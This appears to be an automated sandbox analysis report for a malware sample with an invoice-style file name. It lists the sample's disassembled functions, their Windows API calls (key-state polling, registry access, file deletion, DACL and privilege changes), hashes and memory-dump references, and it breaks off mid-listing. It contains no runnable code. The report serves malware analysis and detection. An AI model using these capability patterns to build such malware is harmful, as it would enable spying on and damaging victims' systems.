                                                                              • Part of subcall function 00F28202: RtlAllocateHeap.NTDLL(00000000,?,00F27CE2), ref: 00F2823E
                                                                              • Part of subcall function 00F28202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F28255
                                                                              • Part of subcall function 00F2829F: GetProcessHeap.KERNEL32(00000008,00F27CF8,00000000,00000000,?,00F27CF8,?), ref: 00F282AB
                                                                              • Part of subcall function 00F2829F: RtlAllocateHeap.NTDLL(00000000,?,00F27CF8), ref: 00F282B2
                                                                              • Part of subcall function 00F2829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F27CF8,?), ref: 00F282C3
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F27D13
                                                                            • _memset.LIBCMT ref: 00F27D28
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F27D47
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F27D58
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00F27D95
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F27DB1
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F27DCE
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F27DDD
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F27DE4
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F27E05
                                                                            • CopySid.ADVAPI32(00000000), ref: 00F27E0C
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F27E3D
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F27E63
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F27E77
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 2347767575-0
                                                                            • Opcode ID: 3a8b5d97af3ebc37fe73be33d2e10a5f111d8e2d94541c4cfd35988f23599215
                                                                            • Instruction ID: 524736c7442bb585b3e37d53e32fcbcd212ecfffe5a4573aba687e1e332d8ab7
                                                                            • Opcode Fuzzy Hash: 3a8b5d97af3ebc37fe73be33d2e10a5f111d8e2d94541c4cfd35988f23599215
                                                                            • Instruction Fuzzy Hash: 8F616C71900619AFDF00DFA0EC44AEEBB79FF04311F0481A9E915A72A1DB359A05EB60
                                                                            Function 00EE66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                                            • API String ID: 0-4228276721
                                                                            • Opcode ID: 0c8ade00b1f7dea8dbb79976ffb709fbacdeb7db542345f5bf60f1bb7bcab87e
                                                                            • Instruction ID: 7a7647d1f90ea7f8023c1e45dbfd0ef32ee4e86e1f57e2f17fee425c73206876
                                                                            • Opcode Fuzzy Hash: 0c8ade00b1f7dea8dbb79976ffb709fbacdeb7db542345f5bf60f1bb7bcab87e
                                                                            • Instruction Fuzzy Hash: C2727F71E00269DBDB24CF59D8807AEB7B5FF58310F24816AE809FB291D7709E81DB94
                                                                            Function 00F3001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00F30097
                                                                            • SetKeyboardState.USER32(?), ref: 00F30102
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00F30122
                                                                            • GetKeyState.USER32(000000A0), ref: 00F30139
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00F30168
                                                                            • GetKeyState.USER32(000000A1), ref: 00F30179
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00F301A5
                                                                            • GetKeyState.USER32(00000011), ref: 00F301B3
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00F301DC
                                                                            • GetKeyState.USER32(00000012), ref: 00F301EA
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00F30213
                                                                            • GetKeyState.USER32(0000005B), ref: 00F30221
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: eb48c75a31932a4e4b0adba787c9abc7cc1dcb7412fe583e5bf54b37d498b650
                                                                            • Instruction ID: 43e1bfdf3ba1e18d16bff74c0a5a448530c1c94c2dddb654b42023fcc090111f
                                                                            • Opcode Fuzzy Hash: eb48c75a31932a4e4b0adba787c9abc7cc1dcb7412fe583e5bf54b37d498b650
                                                                            • Instruction Fuzzy Hash: 8051DC60D0478819FB35EBA488647EABFB49F013B0F08459FD9C1575C2DE649B8CE761
                                                                            Function 00F503DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F504AC
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F5054B
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F505E3
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F50822
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F5082F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: 7cbcb428a04989edce70228d3f90b75dd4bc2ae73d403a64ed82a88a3d692eac
                                                                            • Instruction ID: 35cce75331dde083322195e72560771ef7fab7f03e2ebb9e50db51797800237d
                                                                            • Opcode Fuzzy Hash: 7cbcb428a04989edce70228d3f90b75dd4bc2ae73d403a64ed82a88a3d692eac
                                                                            • Instruction Fuzzy Hash: AAE15F71604214AFCB14DF28C891E2ABBE4FF89715F04856DF94ADB2A2DB30ED05DB91
                                                                            Function 00F483BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • CoInitialize.OLE32 ref: 00F48403
                                                                            • CoUninitialize.COMBASE ref: 00F4840E
                                                                            • CoCreateInstance.COMBASE(?,00000000,00000017,00F62BEC,?), ref: 00F4846E
                                                                            • IIDFromString.COMBASE(?,?), ref: 00F484E1
                                                                            • VariantInit.OLEAUT32(?), ref: 00F4857B
                                                                            • VariantClear.OLEAUT32(?), ref: 00F485DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 4958c5589d80333803656b2017b351d4576e76e9aa0374f0dfed8de1428e4722
                                                                            • Instruction ID: b09cd797fc6ca085c3ce190a5ff2d89ad5d8cc1c0f7c64ad9835f9233e3c5b55
                                                                            • Opcode Fuzzy Hash: 4958c5589d80333803656b2017b351d4576e76e9aa0374f0dfed8de1428e4722
                                                                            • Instruction Fuzzy Hash: 496190716083129FC710DF14C848F6EBBE8AF457A4F044459FD859B2A1CB70ED4AEB92
                                                                            Function 00F44164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: 060d4ebbe5f1d3e79943fe499631f89dc9fa8e9027f08cc87966024e415ea330
                                                                            • Instruction ID: 485044dd575535ba322cc40ef261068cb3ad01cd0a389fe5a21f5acc4c0d56b2
                                                                            • Opcode Fuzzy Hash: 060d4ebbe5f1d3e79943fe499631f89dc9fa8e9027f08cc87966024e415ea330
                                                                            • Instruction Fuzzy Hash: 1A21B5756002149FDB11AF64EC09B6E7BA8FF44721F10806AFE46EB2A1DB70BD41EB54
                                                                            Function 00F337EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                              • Part of subcall function 00F34A31: GetFileAttributesW.KERNEL32(?,00F3370B), ref: 00F34A32
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F338A3
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F3394B
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F3395E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F3397B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3399D
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F339B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: 3ce6485f31d8b6e3f97ce220c3981963fc6f642b588d88a8a65a40fb3483f34d
                                                                            • Instruction ID: 8e41d5c27722d707659b0ebfe69d39a672cbc2028556d9f7c27ca30c01c603de
                                                                            • Opcode Fuzzy Hash: 3ce6485f31d8b6e3f97ce220c3981963fc6f642b588d88a8a65a40fb3483f34d
                                                                            • Instruction Fuzzy Hash: 1A51917280514C9ACF01EBA4C992DEDB7B9EF14320F6000AAE44277291EF316F0EDB61
                                                                            Function 00F3F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F3F440
                                                                            • Sleep.KERNEL32(0000000A), ref: 00F3F470
                                                                            • _wcscmp.LIBCMT ref: 00F3F484
                                                                            • _wcscmp.LIBCMT ref: 00F3F49F
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 00F3F53D
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F553
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 713712311-438819550
                                                                            • Opcode ID: a473899cb507e9a7aa570d3152754ef977c131a6dfd385780f8336b42ae96b9d
                                                                            • Instruction ID: 22966fcf1acaf5ae2948b878e46da529dec0b312d9a4c610c7c847139ae9a400
                                                                            • Opcode Fuzzy Hash: a473899cb507e9a7aa570d3152754ef977c131a6dfd385780f8336b42ae96b9d
                                                                            • Instruction Fuzzy Hash: 6C415C72D0021AAFCF54EF64DC55AEEBBB4FF05320F144466E855A3291EB309E49EB50
                                                                            Function 00F5D43E Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F5D47C
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00F5D49C
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F5D6D7
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F5D6F5
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F5D716
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00F5D735
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F5D75A
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F5D77D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                                            • String ID:
                                                                            • API String ID: 830902736-0
                                                                            • Opcode ID: 658b86253d0a1d0f9cc4a94409b186cdeed22876edb12720d9e3438306f94b80
                                                                            • Instruction ID: 642124abd1cd324cee9076ca3013b8b0a7fcda4d7c9c8768fa54b778d37d52e5
                                                                            • Opcode Fuzzy Hash: 658b86253d0a1d0f9cc4a94409b186cdeed22876edb12720d9e3438306f94b80
                                                                            • Instruction Fuzzy Hash: 2FB18B71A01219EBDF24CF68C9857AD7BB1FF08712F088069EE489F295D734A958EB50
                                                                            Function 00EE3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf
                                                                            • String ID: 3c$_
                                                                            • API String ID: 674341424-4099079164
                                                                            • Opcode ID: 12ed73d9c38ea62b157b357542dc4b0d2016768809c4c5f5decb7b67732f24a6
                                                                            • Instruction ID: 2982017ba8f62e4baac605d47b03655930465c16485f9c8ef281e4f8785ecc0f
                                                                            • Opcode Fuzzy Hash: 12ed73d9c38ea62b157b357542dc4b0d2016768809c4c5f5decb7b67732f24a6
                                                                            • Instruction Fuzzy Hash: 0F22BC716083449FC724DF25C881BAEB7E4EF84714F00592DF99AA7392EB31E945CB92
                                                                            Function 00EE5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 55a5d2e4ca2f7b288d5739923caaf11ce6798abe66a1359bca63a25bd2334b58
                                                                            • Instruction ID: eec38a59269f32e16b6cc63a3df647523ef4f03922b710d0c0a456815c365171
                                                                            • Opcode Fuzzy Hash: 55a5d2e4ca2f7b288d5739923caaf11ce6798abe66a1359bca63a25bd2334b58
                                                                            • Instruction Fuzzy Hash: A812B971A00619DFDF04DFA5D981AEEB7F5FF48304F10952AE806B7292EB36A911CB50
                                                                            Function 00F33B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                              • Part of subcall function 00F34A31: GetFileAttributesW.KERNEL32(?,00F3370B), ref: 00F34A32
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F33B89
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F33BD9
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F33BEA
                                                                            • FindClose.KERNEL32(00000000), ref: 00F33C01
                                                                            • FindClose.KERNEL32(00000000), ref: 00F33C0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 4a37549b7b6bf36919baf671e656b1c3b34bc33a6d821bc0a6c679c3aba0fa81
                                                                            • Instruction ID: 618c285c0316cc8ac124e1ab029f3e26eb5bfd16781d7d4791af81bed18989fa
                                                                            • Opcode Fuzzy Hash: 4a37549b7b6bf36919baf671e656b1c3b34bc33a6d821bc0a6c679c3aba0fa81
                                                                            • Instruction Fuzzy Hash: 75317E714083859FC301EF24D8918AFB7E8AE95324F405D6EF4E5A2291EB21DA0ED763
                                                                            Function 00F351BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2882B
                                                                              • Part of subcall function 00F287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F28858
